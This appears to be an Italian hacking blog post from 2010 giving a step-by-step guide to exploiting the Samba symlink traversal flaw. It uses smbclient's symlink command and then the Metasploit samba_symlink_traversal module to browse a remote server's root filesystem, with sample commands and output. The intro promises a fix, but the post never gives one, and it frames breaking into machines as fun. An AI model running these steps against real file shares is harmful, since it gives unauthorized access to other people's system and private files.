[Samba EXPLOIT]Symlink Traversal (guida metasploit)

sabato, febbraio 6th, 2010│ Categoria: GNU/Linux, Hacking, Software

Ehehe anche i programmi per linux, a volte soffrono di gravi bug, dovuti a qualche incertezza durante la programmazione.


Ad esempio, il famoso client share di ubuntu SAMBA è vulnerabile da un attacco Symlink Traversal.

Questo fattore, permette a chi vuole attaccare una condivisione remoto di leggere non solo la condivisione, ma anche i file nelle altre cartelle.
Vediamo ora come sfruttare questo semplice exploit con metasploit (e non) e come fixare questa vulnerabilità.

Facciamo un esempio, facciamo finta che dal mio ubuntu CLSHACK-PC abbia condiviso la cartella MUSICA.
Ora, da un altro mio pc ubuntu ci accederò cosi:
smbclient -Usmb //CLSHACK-PC/MUSICA/
e Avrò questo output:
Enter smb's password:
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.4.0]
smb: \>
Ora ad esempio, utilizzando il comando ls, posso listare i file che risiedono dentro la condivisione.
Ma se volessi li stare i file in etc?
nessun problema, samba me lo permette :D
Quindi digito:
smb: \>
symlink DESTINAZIONE file
Ora spostiamoci nella cartella file e buon divertimento :)
Usare questo exploit con metasploit ?
Semplice, aggiorniamolo digitando:
svn update
Ora, apriamolo e digitiamo:
use auxiliary/admin/smb/samba_symlink_traversal
Macchina da bucare :)
set RHOST IP_REMOTO
set SMBSHARE NOME_CONDIVISIONE
set SMBTARGET root
run
Avremo questo output(simile):
msf auxiliary(samba_symlink_traversal) > run
[*] Connecting to the server...
[*] Trying to mount writeable share jar...
[*] Trying to link 'root' to the root filesystem...
[*] Now access the following share to browse the root filesystem:
[*] \\192.168.0.152\jar\root\

Perfetto ora spostiamoci nella condivisione:
IP_REMOTO/CONDIVISIONE/root

E buon divertimento :)

Articoli correlati:
  • [exploit]Windows XP SP3 IE 7,8 Remote CODE Execution
  • GUIDA a METASPLOIT IN PDF [65 pagine :) ]
  • IE 6/7 EXPLOIT XML Remote Code Execution with METASPLOIT
  • Autopwn?…e Metasploit fa tutto da solo :)
  • Exploit wshom.ocx (Run) ActiveX Remote Code Execution per IE 6-7-8
  • KiTrap0D Virtual-DOS oday per metasploit :)
  • [guida]Oday-Exploit Adobe Reader: Hack di Windows con metasploit
  • Hack di WINDOWS con metasploit e IE 0day aka (Aurora) exploit
  • Guida all’uso di Metasploit
  • Come installare Metasploit Framework su Ubuntu 9.10 (e derivati)

    • Ti è piaciuto questo articolo? Allora cosa aspetti, abbonati GRATIS ai Feed RSS. Oppure lascia un tuo commento.


    Articolo scritto da clshack.
    Condividi:

    Tag:, ,

    1 commento

    Un commento a “[Samba EXPLOIT]Symlink Traversal (guida metasploit)”

    Trackback e pingback

    1. [Samba EXPLOIT]Symlink Traversal (guida metasploit)
      [...] a vedere articolo: [Samba EXPLOIT]Symlink Traversal (guida metasploit) Articoli correlati: Guida all’uso di [...]

    Scrivi un commento

    XHTML: Tag supportati: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>



    top